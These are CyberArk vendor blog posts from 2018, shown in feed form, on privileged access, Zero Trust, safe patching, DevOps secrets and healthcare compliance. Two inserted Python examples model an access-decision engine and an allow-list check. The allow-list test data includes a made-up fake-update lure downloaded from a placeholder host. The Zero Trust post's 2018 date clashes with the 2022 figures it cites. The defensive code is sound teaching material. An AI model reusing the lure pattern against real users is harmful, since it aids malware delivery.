CyberArk ranks highest in the “Current Offering” and “Market Presence” categories and received the highest possible score for criteria including customer satisfaction, cloud and DevOps support, privileged threat/behavior analytics, privilege delegation and escalation, privileged session monitoring and container support plans, among others.

The CyberArk Privileged Access Security Solution is the most comprehensive solution on the market when it comes to protecting privileged accounts, credentials and secrets at the endpoint, on-premises, on the hybrid cloud and in DevOps environments.

We are proud to be named a Leader by Forrester. This milestone represents a great opportunity to thank our customers and partners who continue to turn to CyberArk as a trusted advisor while rolling out modern infrastructure, improving business agility and driving new opportunities for growth.

To read the full report, The Forrester Wave™: Privileged Identity Management, Q4 2018, click here.

_______

1 – The Forrester Wave™: Privileged Identity Management, Q4 2018 by Andras Cser, November 14, 2018

The Year Ahead: CyberArk’s Top 2019 Cyber Security Predictions https://www.cyberark.com/blog/the-year-ahead-cyberarks-top-2019-cyber-security-predictions/ Tue, 13 Nov 2018 13:44:19 +0000 https://www.cyberark.com/?p=30363/

Cyber security’s 2018 megatrends and myriad emerging threats have created the perfect storm for a tumultuous 2019. From never-before-seen attacks on newly engineered biometric markers and the broad embrace of blockchain, to expanded risks posed for “new” critical infrastructure and the transfer of trust, organizations must look to the threat horizon, and accelerate and collaborate to out-innovate and out-maneuver the attackers.

As we head into 2019, here are five security predictions to prepare for:

1. Prediction: Emerging ‘Unique Human Identities’ Under Attack

We’ll see a new wave of attacks against emerging ‘unique human identities’ – or newly engineered biometric markers for digital and physical authentication. Biometric fingerprint, voice and face ID authentication controls have proven effective in consumer devices, and organizations will look to new authentication methods – like embedded human microchips, for example. Attackers will increasingly target these identities to gather massive amounts of biometric data for future modelling purposes and nefarious use. Genetic consumer services, biometric stores within organizations and more will become key targets, further elevating privacy concerns.

2. Prediction: Government Social Media Becomes Regulated as Critical Infrastructure

Governments will start counting government-sanctioned social media accounts – both for elected officials and agencies – as critical infrastructure. Much like government text messages are regulated in numerous ways, social media will become regulated as well.

Social media has emerged as a critical tool for governments to communicate with citizens. Whether it’s individual politicians and elected officials, or the official accounts of government agencies and organizations, social media is quickly emerging as one of the top pathways for a government to communicate with citizens.

While social media allows for the rapid dissemination of critical information, it also has a dark side, illustrated in the past year by the false missile alerts that sent residents of Hawaii and Japan into a panic. This provides a glimpse of how attackers could use official social accounts to spread chaos.

3. Prediction: Trade Wars Trigger Commercial Espionage

Government policies designed to create ‘trade wars’ will trigger a new round of nation-state attacks designed to steal intellectual property and other trade secrets to gain competitive market advantages. Nation-state attackers will combine existing, unsophisticated, yet proven, tactics with new techniques to exfiltrate IP, as opposed to just targeting PII or other sensitive data.

While these attacks will predominantly be carried out by malicious external attackers, we’ll also see an uptick of insider attacks, especially in cutting-edge industries like autonomous cars (much like occurred at Apple in June 2018). We’ll see attacker dwell times extend as nation-states spend more time conducting reconnaissance and carrying out these trade-driven attacks. We’ll also see the emergence of nation-state weapons commercialized on the black market. This same phenomenon happened after Stuxnet, Petya and NotPetya – where cyber criminals take pieces of code from massive nation-state attacks and incorporate them into their attacks.

4. Prediction: Supply Chain Meets Blockchain

Blockchain will transform the supply chain in 2019. Following allegations of nation-states targeting the supply chain at the chip level to embed backdoors into both B2B and consumer technologies, organizations will embrace blockchain to secure their supply chains. The distributed nature of blockchain makes it well suited to validate every step in the supply chain – including the authenticity of hardware and software. We’ll continue to see increased attacks early on in the supply chain, and there will be greater need for this level of validation.

5. Prediction: Enterprises Transfer Trust and Risk…to Google and Facebook?

The embrace of Google’s BeyondCorp strategy – shifting access controls from the network perimeter to individual users and devices without the need for a traditional VPN – will expand the attack surface in 2019 if the necessary controls are not put in place. This ‘zero trust’ approach can open up several attack vectors. First, it transfers risk and trust to third parties, like Google or Facebook, with velocity. Identity providers are exposed to an expanding attack surface through the use of authentication protocols and short-lived tokens or temporary API keys that can be compromised. This transfer of trust also opens up the very real possibility of attackers weaponizing identity provider assets or services to expose credentials or allow privileged access.

Second, the BeyondCorp approach requires an organization to expose some of its infrastructure in order to allow employees to use applications or access the network. Anytime organizations expose assets to the outside world, they also expose the mistakes they’ve made. Whether it’s ports that are open that shouldn’t be or misconfigured security settings, for example, attackers will look to exploit these visible weaknesses.

Editor’s note: To stay on top of emerging threats, read CyberArk’s Threat Research blog for original research – including new vulnerability discoveries – from CyberArk Labs and the CyberArk Red Team, which are constantly researching and assessing attack vectors.

PAM vs. PIM: Privilege by Any Name Is a Priority https://www.cyberark.com/blog/pam-vs-pim-privilege-by-any-name-is-a-priority/ Fri, 09 Nov 2018 14:19:36 +0000 https://www.cyberark.com/?p=30346/

Privileged accounts, credentials and secrets – and the access they provide – represent the largest security vulnerability enterprises face today. Nearly all of the most destructive cyber attacks this decade were executed by successfully exploiting privileged access. As such, managing and securing privilege is increasingly an organizational priority and a core component of an effective cyber security strategy. But knowing where to start can be confusing. The market offers an alphabet soup of different terms and tools for addressing privileged access security. For example, consider Privileged Access Management, aka PAM, and its close associate, Privileged Identity Management, aka PIM.

To add to the confusion, even top industry analysts like Forrester and Gartner don’t agree on whether to use PAM or PIM. The Gartner Magic Quadrant refers to managing and securing privilege as PAM and the Forrester Wave refers to it as PIM.

However, at the end of the day, privilege by any name is a priority, which is why the Center for Internet Security (CIS) now lists “Controlling the Use of Administrative Privileges” as a basic CIS control. There is also common ground found within the category, with recommendations for best practices and vendor selection provided by trusted industry analysts such as Forrester, Gartner, IDC and KuppingerCole. Vendors who fall into PAM or PIM categories typically offer the following capabilities:

  1. Vault and rotate passwords and other credentials.
  2. Isolate, monitor, record and audit privileged sessions.
  3. Control privileged commands, actions and tasks, including privilege delegation and elevation.
  4. Leverage analytics to monitor for anomalous activities involving privileged access.
  5. Manage and broker credentials and secrets for applications from traditional commercial off-the-shelf applications to new cloud-native applications built using DevOps tools and methodologies.

As it relates to analytics, some analysts do not consider this to be a separate capability. They instead cover analytics as a feature that enhances vaulting, session isolation and controlling privileged sessions. The degree of emphasis placed on securing the credentials used by DevOps tools and cloud-native applications vs. traditional commercial off-the-shelf applications depends upon the analyst firm. Of course, what ultimately matters across these five areas of privileged access will depend on the priorities of your business and your security organization.

Interestingly, privileged access management for end-user endpoints (a.k.a. workstations) is not included on the list above since not all analysts consider this part of the PAM or PIM category. That being said, many vendors who fall into the PAM or PIM category, including CyberArk, offer solutions that limit privilege on end-user endpoints, especially since many attacks involving privileged access start there.

So, where does the CyberArk Privileged Access Security Solution come in, you might ask? CyberArk provides a critical layer of IT security to protect data, infrastructure and assets across the enterprise, in the cloud and throughout the DevOps pipeline. CyberArk has a strong track record for product innovation and a dedicated focus on customer success that includes offering multiple deployment options, including on-premises, cloud and as-a-service.

If you’re here to learn more about securing privileged access, here are some resources you might find of value:

It’s time to put semantics aside and focus on what’s truly important: securing privileged access across your enterprise to ensure you can reduce risk from external attackers or malicious insiders and launch new initiatives – such as investing in modern infrastructure and supporting digital transformation strategies – with confidence.

What Is Zero Trust and Why Is it So Important? https://www.cyberark.com/blog/what-is-zero-trust-and-why-is-it-so-important/ Wed, 07 Nov 2018 20:08:56 +0000 https://www.cyberark.com/?p=98911

Zero Trust.

You’ve heard about it. A lot. But there are quite a few nuances when it comes to how Zero Trust security is defined and discussed. Is it a platform or a principle? It’s one of those terms that’s so widely cited that it has the tendency these days to elicit eye rolls within the cybersecurity industry and to be referred to as a buzzword by those sitting at the cool kids’ lunch table.

At its core, though, Zero Trust is a strategic cybersecurity model designed to protect modern digital business environments, which increasingly include public and private clouds, SaaS applications, DevOps and robotic process automation (RPA). It’s a critical framework, and every organization should adopt it and understand the fundamentals of how it works. Identity-based Zero Trust solutions like single sign-on (SSO) and multi-factor authentication (MFA) are designed to ensure that only authorized individuals, devices and applications can access an organization’s systems and data.

Stated simply, Zero Trust starts from the premise that you can’t reliably separate the “good guys” from the “bad guys.” Traditional approaches that focused on establishing a strong perimeter to keep the bad guys out no longer work. In today’s world, the rapid pace of digital transformation, increased use of cloud services and adoption of hybrid work have created a continually shifting enterprise environment that’s chaotic and difficult to secure. This gave rise to the “never trust, always verify” Zero Trust approach, which secures identities, endpoints, applications, data, infrastructure and networks while providing visibility, automation and orchestration.

With Zero Trust, no actor can be trusted until they’re verified. Nobody. No one. Zero exceptions. It’s a holistic, strategic framework for security that ensures everyone – and every device – granted access is who and what they say they are.

So, Why Zero Trust?

Today, cybersecurity incidents ranging from ransomware and phishing to denial-of-service attacks dominate the news. An increase in cloud applications, mobile devices, remote workers and IoT-connected devices has forced organizations to align their security policies based on business intent. Embracing Zero Trust means adopting technologies, ways of working and policies that support business agility while enhancing security.

Consider these findings:

  • Ransomware breaches rose 13% from 2021, representing an increase greater than the past five years combined.
  • Seventy-one percent of organizations suffered a successful software supply chain-related attack in the past year, resulting in data loss or asset compromise.
  • Meanwhile, the average cost of a data breach hit an all-time high of $4.35 million in 2022.

So, before an organization can take advantage of Zero Trust, it must create a set of identities for its employees, their devices and the applications they use. Most importantly, it is essential that all these capabilities are integrated and work together so they can be applied in real time without adding delays to access decisions for APIs or for users who are logging onto applications.

From Novel Cybersecurity Concept to De Facto Approach

The phrases “Zero Trust” and “Zero Trust architecture” were coined in 2010 by industry analyst John Kindervag, who recognized the futility of perimeter-based security. The philosophy upended conventional thinking about infrastructure, network and data security, and it took hold as identity-based threats surged. Fast-forward to the present day, and Zero Trust is the de facto cybersecurity approach – the digital modernization measuring stick championed by government and industry leaders alike. Why? Because identity is more important than ever.

  • Identities are everywhere: The average staff member now has 30 identities and machine identities outnumber these human identities 45:1.
  • Identity is the easy way in: 52% of organizations don’t protect identities linked to business-critical applications, and nearly half lack Identity Security controls around cloud infrastructure and workloads. Meanwhile, 87% report that secrets are stored in multiple places across DevOps environments.
  • Identity worries keep teams up at night: Security leaders say credential theft is their number one area of risk. As more assets move to the cloud, hybrid work becomes the “forever” model, digital transformation continues and third-party access needs expand, attackers are targeting identities that are often neither secured nor properly managed.

With this as a backdrop, it’s no surprise that 88% of senior security executives say adopting more of a Zero Trust approach is “very important” or “important.” And many are taking action. According to Enterprise Strategy Group’s (ESG) research report “The Holistic Identity Security Maturity Model,” more than half of global organizations surveyed have implemented or have started to implement a well-defined Zero Trust strategy across their IT estate.

The Five Principles of Any Zero Trust Implementation

Many frameworks exist to help organizations move toward Zero Trust, such as CISA’s Zero Trust Maturity Model and NIST’s SP 800-207 Zero Trust Architecture. Since every company is different, these frameworks are designed to guide – not prescribe – Zero Trust strategy and roadmap development, along with implementation and compliance. While this leaves room for flexibility, every effective Zero Trust program should share five constants:

  1. Strong, adaptive authentication. Adding an adaptive form of MFA with intelligent risk-based access strengthens password security and provides important user behavior analytics for everyone’s benefit. Organizations can spot potential threats faster, and users can simply and securely access resources.
  2. Continuous approval and authorization. Reauthenticating and revalidating user identities (after high-risk web browser sessions or periods of inactivity, for example) help ensure the right user has access to the right resources.
  3. Secure, least privilege access. Intelligently granting access to individual enterprise resources – from the endpoint to the cloud – requires advanced privileged access management (PAM) controls. The most effective approaches enable dynamic provisioning, such as granting just-in-time (JIT) privileged access on a per-session basis to reduce standing privileged access risks.
  4. Continuously monitor and attest. Just as privilege is not binary, neither are access decisions. Continuous monitoring is the best way to understand what is happening and confirm it should be happening, detecting anomalies as they arise and maintaining a sound security posture over time.
  5. Credential and authentication protection. Endpoint privilege management is the cornerstone of strong endpoint protection, critical for detecting and blocking credential theft attempts (via software abuse or memory scraping), enforcing least privilege consistently (including local admin rights removal) and applying flexible application control (such as allow-listing for well-known sources) to defend against malware and ransomware.
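The five principles are easiest to see when they are wired into one access decision. The following toy policy decision point is an added example, not CyberArk code or any product’s logic: it assumes an upstream MFA result, a device-posture flag and a 0-100 risk score as inputs, and the inactivity window, grant lifetime, thresholds and resource names are assumptions chosen for illustration. Sensitive resources require a live just-in-time grant rather than standing access, idle or risky sessions are forced to re-verify, and every decision is written to an audit list.

```python
"""Toy policy decision point (PDP) showing how the five principles combine.

Added example, not CyberArk code. Thresholds, resource names, the sample
requests and the grant lifetime are assumptions chosen for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

REAUTH_AFTER_IDLE = timedelta(minutes=15)   # assumed inactivity window (principle 2)
JIT_GRANT_TTL = timedelta(minutes=30)       # assumed per-session grant lifetime (principle 3)
RISK_STEP_UP, RISK_DENY = 40, 75            # assumed risk-score thresholds on a 0-100 scale


@dataclass(frozen=True)
class AccessRequest:
    user: str
    resource: str
    action: str
    mfa_verified: bool        # principle 1: strong authentication already completed?
    device_compliant: bool    # device posture from the endpoint agent (assumed input)
    risk_score: int           # adaptive/UBA risk, 0-100 (assumed input)
    last_activity: datetime
    now: datetime


@dataclass
class PolicyDecisionPoint:
    sensitive: frozenset = frozenset({"prod-db-admin", "domain-admin"})
    grants: dict = field(default_factory=dict)   # (user, resource) -> expiry time
    audit: list = field(default_factory=list)    # principle 4: every decision is logged

    def evaluate(self, req: AccessRequest) -> str:
        decision = self._decide(req)
        self.audit.append((req.now.isoformat(), req.user, req.resource, req.action, decision))
        return decision

    def _decide(self, req: AccessRequest) -> str:
        # Deny by default: no verified identity or a non-compliant device gets nothing.
        if not req.mfa_verified:
            return "DENY:no-mfa"
        if not req.device_compliant:
            return "DENY:device-noncompliant"
        # Continuous re-verification: an idle session must re-authenticate first.
        if req.now - req.last_activity > REAUTH_AFTER_IDLE:
            return "STEP_UP:idle"
        # Adaptive: a risk spike overrides static entitlements at any point in the session.
        if req.risk_score >= RISK_DENY:
            return "DENY:risk"
        if req.risk_score >= RISK_STEP_UP:
            return "STEP_UP:risk"
        # Least privilege: sensitive resources need a live JIT grant, never standing access.
        if req.resource in self.sensitive:
            expires = self.grants.get((req.user, req.resource))
            if expires is None or expires <= req.now:
                self.grants.pop((req.user, req.resource), None)  # drop the stale grant
                return "DENY:no-jit-grant"
        return "ALLOW"

    def issue_jit(self, user: str, resource: str, now: datetime) -> datetime:
        """Grant time-bounded access for one session; returns the expiry."""
        expires = now + JIT_GRANT_TTL
        self.grants[(user, resource)] = expires
        self.audit.append((now.isoformat(), user, resource, "jit-grant", expires.isoformat()))
        return expires


def run_demo():
    """Drive the PDP through constructed requests; returns (decisions, audit log)."""
    t0 = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)
    pdp = PolicyDecisionPoint()
    base = dict(user="alice", mfa_verified=True, device_compliant=True, risk_score=10)

    def req(resource, now, last=None, **over):
        return AccessRequest(resource=resource, action="ssh", last_activity=last or now,
                             now=now, **dict(base, **over))

    decisions = [
        pdp.evaluate(req("wiki", t0)),                                   # ALLOW
        pdp.evaluate(req("prod-db-admin", t0)),                          # DENY:no-jit-grant
    ]
    pdp.issue_jit("alice", "prod-db-admin", t0)
    decisions += [
        pdp.evaluate(req("prod-db-admin", t0 + timedelta(minutes=5))),   # ALLOW (grant live)
        pdp.evaluate(req("prod-db-admin", t0 + timedelta(minutes=45))),  # DENY:no-jit-grant (expired)
        pdp.evaluate(req("wiki", t0 + timedelta(minutes=20), last=t0)),  # STEP_UP:idle
        pdp.evaluate(req("wiki", t0, risk_score=50)),                    # STEP_UP:risk
        pdp.evaluate(req("wiki", t0, risk_score=90)),                    # DENY:risk
        pdp.evaluate(req("wiki", t0, mfa_verified=False)),               # DENY:no-mfa
    ]
    return decisions, pdp.audit


if __name__ == "__main__":
    for line in run_demo()[1]:
        print(*line)
```

The ordering of checks is the point: authentication and device posture are evaluated before any entitlement, risk is re-read on every request rather than once at login, and the JIT grant is consulted at the moment of access, so an expired grant fails closed even though the user was allowed five minutes earlier.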

Figure: Five principles of the Zero Trust strategic cybersecurity model.

While definitions for these principles (or “tenets” or “pillars”) vary somewhat across frameworks, Identity Security is foundational to all of them. Apply these identity-based principles first to accelerate the journey, measurably reduce risk and improve business outcomes.

Identity Security as the Central Pillar of Zero Trust

By now, it should be clear that Zero Trust is not a single technology but an approach for denying access by default, verifying every identity, validating every device and intelligently limiting access to every resource. Identity Security offers a robust set of unified access controls to enable Zero Trust by:

  1. Enforcing least privilege and securing access for humans and machines across any device, anywhere.
  2. Introducing intelligent privilege controls — and infusing them across the board — to help isolate and stop attacks, protect critical assets and grant access for just the right amount of time.
  3. Automating management of the identity lifecycle through seamless, no-code app integrations and workflows, taking control of excessive permissions to enforce least privilege.
  4. Continually monitoring for threats so enterprises can adjust controls based on user behavior to identify when an identity has been compromised.

With Identity Security as the backbone of a Zero Trust approach, teams can focus on identifying, isolating and stopping threats from compromising identities and gaining privilege before they can do harm.

Putting Your Trust in Zero Trust

Zero Trust security is a journey, not a destination: an iterative process rather than a one-time implementation, requiring continuous monitoring and improvement to strengthen your cybersecurity posture. As such, organizations still need complementary security measures alongside a mature, measurable Zero Trust program.

For a deeper dive into Zero Trust, check out the CyberArk whitepaper “Zero Trust’s Evolution: The Role of Identity Security.”

Securely Patch Software with CyberArk Endpoint Privilege Manager https://www.cyberark.com/blog/securely-patch-software-with-cyberark-endpoint-privilege-manager/ Tue, 06 Nov 2018 20:12:21 +0000 https://www.cyberark.com/?p=30326/

When organizations update or patch software, decisions have to be made about which code changes to install within the network to improve systems and/or fix security vulnerabilities. For IT administrators, prioritizing and scheduling upgrades can be a tall but necessary order. They also need to get their teams on board, because patching or updating systems can slow production while workstations are restarted, and employees frequently see pop-up windows prompting a restart so their computers can complete the upgrade. There are also growing concerns among security teams that attackers might inject malicious software onto the network during upgrade windows or trick end users, as recently seen with cryptomining malware disguised as an Adobe Flash update.

Updating software helps organizations remedy certain vulnerabilities or bugs, improve workstation performance and introduce new features. The Petya attack in 2017 raised awareness of the dangers of not patching or updating software. Yet even with these inherent benefits and recently heightened awareness, 44 percent of organizations today say it still takes weeks to apply security patches, with 30 percent reporting that it takes a month or longer.

Despite the potential operational burdens and growing concerns of attackers targeting software updates as a network entry point, staying current with patches is both critical as well as a recommended best practice.

As organizations improve their ability to programmatically upgrade and patch software, attackers are in turn getting stealthier. Where end users and IT teams update and patch promptly, attackers have predictably adapted: they target the update process itself to get in, create backdoor access, spread malware or simply wreak havoc. In short, attackers have refined the ways they install malware or inject malicious software onto endpoints during updates and patches. One path is a phishing email that prompts an unsuspecting user to install a fake update, which in turn installs malware on their system. For example, a 2018 campaign dubbed “Fake Updates” spread bogus patches for software such as Google Chrome, Mozilla Firefox, Internet Explorer and Adobe Flash Player.

Now might be the time that you ask, “Why bother updating software if attackers are going to try to get into my organization that way?” It bears repeating that regular software updates are critical to risk reduction. In choosing to ignore this, organizations will find themselves with a mixed network of legacy and modern software versions, which has been proven time and time again to be very risky. That’s why it’s so crucial to not only have a strategy in place to consistently upgrade and patch your systems, but to also do so in a secure, controlled way.

There are three steps that every organization should take in order to safely patch their software.

  • First, identifying and establishing a patch management process helps to reduce the security vulnerabilities associated with unpatched software. It is recommended that security teams document and standardize patching by writing down repeatable steps and processes for how the organization will address software updates and patches.
  • Second, organizations should use application whitelisting to prevent attackers from misleading people into downloading “fake” or malicious patches that spread throughout the organization.
  • And finally, deploying upgrades in test environments first is also critical, because it allows security teams to check and verify that patches are safe to roll out to the entire organization.

Maintaining security and operational use during patching supports a successful program, but it can be difficult to find tools and strategies that provide both components. CyberArk Endpoint Privilege Manager is typically deployed by organizations that want to protect against credential theft on endpoints and also want to protect against fake patches with application whitelisting. CyberArk Endpoint Privilege Manager creates application control and privilege elevation policies based on trusted sources such as SCCM (System Center Configuration Manager), software distributors, updaters and URLs, to name a few examples. This means that even if a user attempted to install a rogue software update, CyberArk Endpoint Privilege Manager would identify the patch as untrusted and not let it run.
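To make the trusted-source idea concrete, here is an added example of the kind of check an endpoint control can apply before an update binary is allowed to run. It is illustrative code, not CyberArk Endpoint Privilege Manager’s implementation: the trusted signer names, updater process names, download hosts, the approved-hash manifest and the sample events are all assumptions, and the verified signer, parent process and download origin are supplied on each event rather than read from the operating system so the example runs anywhere.

```python
"""Trusted-source checks applied to an update binary before it may run.

Added example, not CyberArk Endpoint Privilege Manager code. The trust lists,
signer names, process names, hashes and the sample events are assumptions.
"""
import hashlib
from dataclasses import dataclass
from typing import Optional, Tuple
from urllib.parse import urlparse

# Trust anchors an administrator would maintain. In a real agent the signer comes
# from the file's verified code-signing certificate, and the parent process and
# download origin from the OS; here they arrive on the event (assumed inputs).
TRUSTED_SIGNERS = {"Google LLC", "Mozilla Corporation", "Microsoft Corporation"}
TRUSTED_UPDATERS = {"ccmexec.exe", "googleupdate.exe"}     # SCCM client, vendor updater (assumed)
TRUSTED_DOWNLOAD_HOSTS = {"dl.google.com", "download.mozilla.org"}


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Vendor-published hashes of approved patches, keyed by digest (constructed content).
APPROVED_HASHES = {sha256(b"chrome_installer_120 (constructed)"): "Chrome 120 update"}


@dataclass(frozen=True)
class ExecEvent:
    path: str
    content: bytes           # file bytes (constructed for the example)
    signer: Optional[str]    # verified code-signing subject; None if unsigned or invalid
    parent: str              # process that launched the file
    origin: Optional[str]    # download URL recorded with the file, if any


def decide(ev: ExecEvent) -> Tuple[str, str]:
    """Return (verdict, reason). A binary runs only if it can be tied to a trusted
    source; everything else is blocked by default, however convincing its name."""
    digest = sha256(ev.content)
    if digest in APPROVED_HASHES:
        return "ALLOW", f"hash matches approved patch '{APPROVED_HASHES[digest]}'"
    signed = ev.signer in TRUSTED_SIGNERS
    # Parent-process trust is combined with a signature so that malware merely named
    # like an updater (or dropped by a hijacked one) does not inherit the trust.
    if signed and ev.parent.lower() in TRUSTED_UPDATERS:
        return "ALLOW", f"launched by trusted updater {ev.parent}, signed by {ev.signer}"
    host = (urlparse(ev.origin).hostname or "").lower() if ev.origin else ""
    if signed and host in TRUSTED_DOWNLOAD_HOSTS:
        return "ALLOW", f"downloaded from {host}, signed by {ev.signer}"
    reasons = []
    if not signed:
        reasons.append("unsigned or untrusted signer")
    if ev.parent.lower() not in TRUSTED_UPDATERS:
        reasons.append(f"launched by {ev.parent}, not a trusted updater")
    if host not in TRUSTED_DOWNLOAD_HOSTS:
        reasons.append(f"origin {host or 'unknown'} is not a trusted download host")
    return "BLOCK", "; ".join(reasons)


def run_demo() -> list:
    """Evaluate constructed events: a genuine patch, two fake-update lures and a
    signed vendor download. Returns (verdict, reason) pairs in order."""
    events = [
        ExecEvent(r"C:\Temp\chrome_installer.exe", b"chrome_installer_120 (constructed)",
                  "Google LLC", "GoogleUpdate.exe", None),
        ExecEvent(r"C:\Users\bob\Downloads\Chrome-Update.exe", b"MZ lure (constructed)",
                  None, "explorer.exe", "http://chrome-update-now.example/Chrome-Update.exe"),
        ExecEvent(r"C:\ProgramData\GoogleUpdate\setup.exe", b"MZ lure 2 (constructed)",
                  None, "googleupdate.exe", None),
        ExecEvent(r"C:\Users\bob\Downloads\Firefox Setup.exe", b"firefox setup (constructed)",
                  "Mozilla Corporation", "explorer.exe", "https://download.mozilla.org/?product=firefox"),
    ]
    return [decide(ev) for ev in events]


if __name__ == "__main__":
    for verdict, reason in run_demo():
        print(f"{verdict:5} {reason}")
```

Two design choices matter here. Updater and URL trust are only honored together with a trusted signature, because a file name or parent process is trivial for an attacker to imitate, whereas a valid publisher signature is not. And the block reason lists every missing trust source, so an administrator who wants to permit an internal, unsigned package adds its hash to the manifest deliberately instead of widening a rule to make the alert go away.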

Having tools in place that allow administrators and security teams to verify unknown applications and identify potentially dangerous malware is important to help reduce the risk and mitigate damage from an attack.

It may feel like you are stuck between a rock (call this operations) and a hard place (security), but we’re here to help. For more information on how to secure your most sensitive assets, including how to secure your organization’s endpoints, please visit our website or reach out to our team to discuss further.

New KuppingerCole Report Highlights the Importance of Securing DevOps and Agile IT Environments https://www.cyberark.com/blog/new-kuppingercole-report-highlights-the-importance-of-securing-devops-and-agile-it-environments/ Thu, 01 Nov 2018 18:47:53 +0000 https://www.cyberark.com/?p=30211/

KuppingerCole has just released a new report, “Security for DevOps and Agile IT: Preventing attacks in highly dynamic environments.” Authored by Martin Kuppinger and published in October 2018, the report addresses many of the key topics that security practitioners, security leaders and development team leads need to consider when improving the security of DevOps environments.

Expanded Attack Surface

Organizations are discovering that as the use and adoption of DevOps and Agile IT has increased, securing these environments has become an increasingly important priority. In fact, in just a few years DevOps has changed how IT operates, and most importantly for security professionals, the increased use of microservices, together with the increased number of DevOps tools used in the CI/CD pipeline, has expanded the attack surface relative to more traditional development environments. The four major drivers expanding the attack surface are:

  1. More secrets
  2. More components
  3. Increased volatility
  4. Increased scale

Top Requirements

The top requirements for securing an organization’s DevOps environment include factors such as the ability to:

  • Consistently manage all types of secrets.
  • Avoid islands of security or reliance on the native capabilities of standalone tools.
  • Focus on simplicity and ease of use for developers.
  • Establish a robust tamper-proof audit capability.
  • Integrate with the organization’s existing Privileged Access Security (or privileged access management to use KuppingerCole’s terminology) infrastructure.

Mapping DevOps Security Needs with Existing Investments in Privileged Access Security

Security teams wrestling with how DevOps security fits within the organization’s broader Privileged Access Security environment should find the insights particularly interesting. For example, existing solutions alone are likely not adequate for securing Agile IT and DevOps environments. They simply don’t meet the requirements necessary for securing a typical, highly dynamic DevOps environment. Instead specialized security solutions are needed to secure DevOps environments, in addition to the existing privileged access security solutions the organization has deployed. However, rather than two separate systems, some form of integrated solution is required.

Action Plan for Securing Secrets

Most importantly, the report outlines an action plan for securing secrets and credentials in DevOps and Agile IT environments and highlights the importance of:

  • Making it easy for developers to secure their applications and code.
  • Isolating APIs so that security services can be refreshed and changed without requiring changes to code.
  • Providing an integrated view and ability to manage privilege and secrets.
  • Capturing and monitoring events by integrating with SIEM and other security systems.

A full copy of the report is available here. For more information on CyberArk solutions, including CyberArk Conjur for securing DevOps environments, visit cyberark.com/conjur. CyberArk Conjur is also available as open source at conjur.org – the open source version enables developers to rapidly gain experience using a powerful secrets management solution.

The Role of Privileged Access in Healthcare Security and Compliance https://www.cyberark.com/blog/the-role-of-privileged-access-in-healthcare-security-and-compliance/ Mon, 29 Oct 2018 14:59:46 +0000 https://www.cyberark.com/?p=30189/

The increased use of electronic personal health information (ePHI) coupled with rapid advances in healthcare technology – from cloud-based applications to IoT-enabled devices to telemedicine – has created complex healthcare delivery networks that are target-rich environments for cyber attackers.

Outdated and unsupported software, a massive cyber security skills shortage and rapidly evolving technology have left hospitals and healthcare systems vulnerable to ransomware and internal threats to ePHI – both malicious and those resulting from human error. All the while, regulations around ePHI, such as HIPAA HITECH and GDPR, continue to increase while non-compliance is bringing stiffer penalties, particularly with regard to privileged access management.

According to Verizon, “58% of incidents involved insiders—healthcare is the only industry in which internal actors are the biggest threat to an organization.” However, the attack vectors are expansive in healthcare. When it comes to privileged access, you have to consider all of the human points of access, including people with administrator rights, along with non-human access – including the applications and medical devices that interact with critical systems and enable fundamental processes such as integrating patient diagnostic data from third-party services or seeking reimbursement from a payer organization.

Managing access to privileged accounts, credentials and secrets is an effective way to limit the moves a threat actor can make after they establish a foothold on the network. With privileged access security measures in place, an attacker’s ability to escalate privileges and move laterally to access sensitive systems will be minimized. Proper cyber security hygiene in an environment where the stakes are so high is absolutely critical. This starts with effectively managing privileged access.

The Current Healthcare Environment

Innovation continues to introduce new technologies that improve patient care, but could leave organizations at risk. With ePHI now being dispersed across expansive networks of patient monitoring devices, mobile endpoints for employees and self-service patient web portals, the risk to healthcare providers continues to evolve. Only those organizations that take a holistic approach to securing their environments – including correct privileged access control – will reduce the risk of a catastrophic cyber security incident.

Building “high walls” to protect an organization’s perimeter is an outdated approach to security. According to the CyberArk Global Advanced Threat Landscape Report 2018, 52 percent of healthcare IT decision-makers cannot prevent attackers from breaking into their networks, and 59 percent believe that customers’ personally identifiable information (PII) could be at risk. Therefore, we challenge organizations to assume that a breach will happen and to implement security tools that prevent an attacker from gaining access to sensitive systems.

Tightening Regulations and Harsher Penalties

As ransomware and other cyber attacks continue at an alarming rate, IT organizations face an increasingly tight regulatory environment. Strong privileged access security (or the lack thereof) can make or break a healthcare organization’s ability to demonstrate compliance and avoid financial penalties. This was illustrated last year, when Florida-based Memorial Healthcare Systems (MHS) agreed to pay the U.S. Department of Health and Human Services (HHS) $5.5 million to settle violations of HIPAA HITECH rules. This fine was a result of failure to review access controls and examine audit logs, giving unauthorized employees access to ePHI through shared login credentials.

The following diagram from HIPAA Journal outlines the potential penalties healthcare organizations face for non-compliance with HIPAA HITECH. As evidenced in the MHS case, penalties for “willful neglect” can reach millions, and under certain conditions, penalties can now extend to third-party contractors and business associates.

SOURCE: HIPAA JOURNAL (https://www.hipaajournal.com/hipaa-violation-fines/)

Beyond these regulatory penalties, there are significant operational costs to recover from a data breach. A Ponemon study found that a healthcare data breach costs on average $380 per record – more than 2.5 times the global average across industries.

To demonstrate compliance with HIPAA HITECH, GDPR and other industry regulations, healthcare providers must have access to documented, auditable proof of their efforts to protect privileged access. Audit trails require a solution that enables comprehensive monitoring, recording and isolation of all privileged user sessions, detailed activity reports on critical ePHI databases and applications, fully searchable audit logs, and complete, multi-layered audit trail data protection.

Protecting Your Integrated Care Delivery Network Investment with CyberArk

Organizations must manage privileges to proactively protect against, detect and respond to attacks in progress before attackers compromise vital systems and data. But managing privileges does not mean denying them. Instead, it is a matter of controlling who has access to what and why. Managing privileged access is a part of basic cyber security hygiene and can have a huge, positive impact on an organization’s security posture and compliance efforts.

Because privileged access security complements existing security tools, it helps organizations leverage their existing cyber security investments towards demonstrable improvements. Privileged access security is an essential first step in maturing a healthcare cyber security program and must be a priority.

The CyberArk Privileged Access Security Solution provides proactive, automated, end-to-end detection and protection for all privileged access to systems containing ePHI. Privileged threat detection and analytics provide the ability to respond to and remediate any anomalous or high-risk activity. Monitoring privileged activity to ensure users are not disabling, circumventing or altering implemented security safeguards and controls is not only a best practice but often required by regulations.

An enterprise architect at a major public research university health system commented, “Our systems are critical to patient care. Compromised account credentials or compromised applications can lead to PHI/PII exposure and/or outages to patient care systems. The CyberArk Privileged Access Security Solution gives us the ability to expose and understand where our risks are, allowing us to take steps to secure things better.”

